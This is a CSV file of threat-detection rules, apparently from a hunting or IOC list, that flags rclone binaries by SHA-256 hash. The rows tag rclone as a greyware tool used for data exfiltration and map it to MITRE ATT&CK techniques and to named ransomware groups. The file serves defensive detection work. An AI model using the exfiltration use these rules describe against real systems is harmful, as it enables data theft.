"*8787b7404348874e5917f55316fcbae979f0b1358d9fa7c3c13f5019027afde4*",".{0,1000}8787b7404348874e5917f55316fcbae979f0b1358d9fa7c3c13f5019027afde4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*879b6b220338f388f14152df2b7b92abce0baa3feac0de0858fd2c6c7a906637*",".{0,1000}879b6b220338f388f14152df2b7b92abce0baa3feac0de0858fd2c6c7a906637.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*87a2fcc9f478c587a81b872f0943a0a280b6c663bb56222131c8b685f14ee1f2*",".{0,1000}87a2fcc9f478c587a81b872f0943a0a280b6c663bb56222131c8b685f14ee1f2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*87c37a74f246d2cdb49d5392c0bbe27e09033446346e839204eabd47224d5880*",".{0,1000}87c37a74f246d2cdb49d5392c0bbe27e09033446346e839204eabd47224d5880.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*880a24b003db1825ec63774cb5cb0c8a0b848d254eac6f977b700649e2baf4d9*",".{0,1000}880a24b003db1825ec63774cb5cb0c8a0b848d254eac6f977b700649e2baf4d9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*88ed9c876b03d2cc745463903ac5233e441cd56d0d1031906bc8381af11ea0c8*",".{0,1000}88ed9c876b03d2cc745463903ac5233e441cd56d0d1031906bc8381af11ea0c8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*891355660e32ea092c0af8602c2fad7602196bed297218d41ce8ba307ab84459*",".{0,1000}891355660e32ea092c0af8602c2fad7602196bed297218d41ce8ba307ab84459.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8914b7193d1961310e5247a9217ca8ed80bf212a25c889d432594f9ba533462d*",".{0,1000}8914b7193d1961310e5247a9217ca8ed80bf212a25c889d432594f9ba533462d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8922dfdc60c1bfb47a62ba4635e764a7e2882e6d8c74bcd96f8c5c1021000682*",".{0,1000}8922dfdc60c1bfb47a62ba4635e764a7e2882e6d8c74bcd96f8c5c1021000682.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*895d847eec516f9d8eb2cf8a08408c92523d1430d9dc2e91c5ed5268eb424479*",".{0,1000}895d847eec516f9d8eb2cf8a08408c92523d1430d9dc2e91c5ed5268eb424479.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*89fc051ffcc3b4b549366dddc833f7f60f0115b7adc026cfdadb043d694d4332*",".{0,1000}89fc051ffcc3b4b549366dddc833f7f60f0115b7adc026cfdadb043d694d4332.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8a2d2210931d6334c680e3a73145f7bea3c90cf42c840b20d86a4e60b21147a1*",".{0,1000}8a2d2210931d6334c680e3a73145f7bea3c90cf42c840b20d86a4e60b21147a1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8a30340a7b37099b38bd6775171908ab550303bfa6fea9c2698b9f28458eaafa*",".{0,1000}8a30340a7b37099b38bd6775171908ab550303bfa6fea9c2698b9f28458eaafa.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8a5a774f86857f7bbae3b31c87eb96be8ded925210b2ca02b02c13dc6ee2458a*",".{0,1000}8a5a774f86857f7bbae3b31c87eb96be8ded925210b2ca02b02c13dc6ee2458a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8a7b41190834b28f984007d406f9c9cde8388135f8d6f2d41a821b150a13a644*",".{0,1000}8a7b41190834b28f984007d406f9c9cde8388135f8d6f2d41a821b150a13a644.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8ae07a6baa55ac7873e964c424516b450221b32e0d7f67117687e04561268848*",".{0,1000}8ae07a6baa55ac7873e964c424516b450221b32e0d7f67117687e04561268848.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8af51e617e16cfeef3b087bbfdc9af15ec60c8195e0cb4cdef538481dfbc28ed*",".{0,1000}8af51e617e16cfeef3b087bbfdc9af15ec60c8195e0cb4cdef538481dfbc28ed.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8b98893fa34aa790ae23dd2417e8c9a200326c05feb26101dff09cda479aeb1f*",".{0,1000}8b98893fa34aa790ae23dd2417e8c9a200326c05feb26101dff09cda479aeb1f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8bb8d4acbcdb764276388f7cb19ee013462c9256d9fbd6068a613cca32355955*",".{0,1000}8bb8d4acbcdb764276388f7cb19ee013462c9256d9fbd6068a613cca32355955.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8bf113cc1a24b7c1b5d2520e9e3e0f1537976afdf5dab671f92f28c91b4d00be*",".{0,1000}8bf113cc1a24b7c1b5d2520e9e3e0f1537976afdf5dab671f92f28c91b4d00be.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8bfa813b6ae328d1a7acfe1f3919f473b482a3518afb9059bf644a2294e2ba1e*",".{0,1000}8bfa813b6ae328d1a7acfe1f3919f473b482a3518afb9059bf644a2294e2ba1e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8c0d6588192d65999d56f11d646d9ea17c787df2900f6061f5ac588eb18f0de6*",".{0,1000}8c0d6588192d65999d56f11d646d9ea17c787df2900f6061f5ac588eb18f0de6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8c589958321e847159b4c7cb3ada26e6039fffbc26a5bb6d85f34be77e136394*",".{0,1000}8c589958321e847159b4c7cb3ada26e6039fffbc26a5bb6d85f34be77e136394.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8ca61966362d5e4cf80451b1fb49151514dc8877b931c3560cdc6b44348b0501*",".{0,1000}8ca61966362d5e4cf80451b1fb49151514dc8877b931c3560cdc6b44348b0501.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8cd5ba036af3ec08897247e2092b3378d85aebf93b9c54714f7bfe644df9bbb2*",".{0,1000}8cd5ba036af3ec08897247e2092b3378d85aebf93b9c54714f7bfe644df9bbb2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8cefe89e6d4a1fd83f8b26e6c6e2f260a18089b09cb008850bef13ceba997aec*",".{0,1000}8cefe89e6d4a1fd83f8b26e6c6e2f260a18089b09cb008850bef13ceba997aec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8d0dc8dfb7dacb735f1a81511ef4b9bc11b1688e8f38414dee85bab39f66fab9*",".{0,1000}8d0dc8dfb7dacb735f1a81511ef4b9bc11b1688e8f38414dee85bab39f66fab9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8d212e6de4c0cabd27572d0bf82784e470cc7732e7f8c866e7938a8132e1a768*",".{0,1000}8d212e6de4c0cabd27572d0bf82784e470cc7732e7f8c866e7938a8132e1a768.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8d218882bc3b64970ace2e697a58b701b64a2dc5d15d582244a3aaf93c9e3284*",".{0,1000}8d218882bc3b64970ace2e697a58b701b64a2dc5d15d582244a3aaf93c9e3284.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8d5b9b9d08ffc221d1d3e37c68615134a582a91dfee1a5e482de687791716e55*",".{0,1000}8d5b9b9d08ffc221d1d3e37c68615134a582a91dfee1a5e482de687791716e55.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8d6c023d196a5b8bed12a6e85981bca95fc50c5d234b66d92c78231b6f70b852*",".{0,1000}8d6c023d196a5b8bed12a6e85981bca95fc50c5d234b66d92c78231b6f70b852.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8d799787a28a5c3c5c374bd736847d6036f29f93c96b476b680ebc15abd3e43c*",".{0,1000}8d799787a28a5c3c5c374bd736847d6036f29f93c96b476b680ebc15abd3e43c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8db3577c9f2403b2a1de27558998bacc3a2572d05046993116f7e99974c30eb4*",".{0,1000}8db3577c9f2403b2a1de27558998bacc3a2572d05046993116f7e99974c30eb4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8dbf95ef1a8e2f9071b37445a940ef42dc1edab61897a0616741e51f0f57b841*",".{0,1000}8dbf95ef1a8e2f9071b37445a940ef42dc1edab61897a0616741e51f0f57b841.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8dc635e8706d5cfe7bd8cafbd8a0885431f57b4b4a2804076796cdf2aea633cc*",".{0,1000}8dc635e8706d5cfe7bd8cafbd8a0885431f57b4b4a2804076796cdf2aea633cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*8ddb3051c0e78a09fdeb747ecc8c10ab027b760e354f07fb7255ff1879d5ca10*",".{0,1000}8ddb3051c0e78a09fdeb747ecc8c10ab027b760e354f07fb7255ff1879d5ca10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
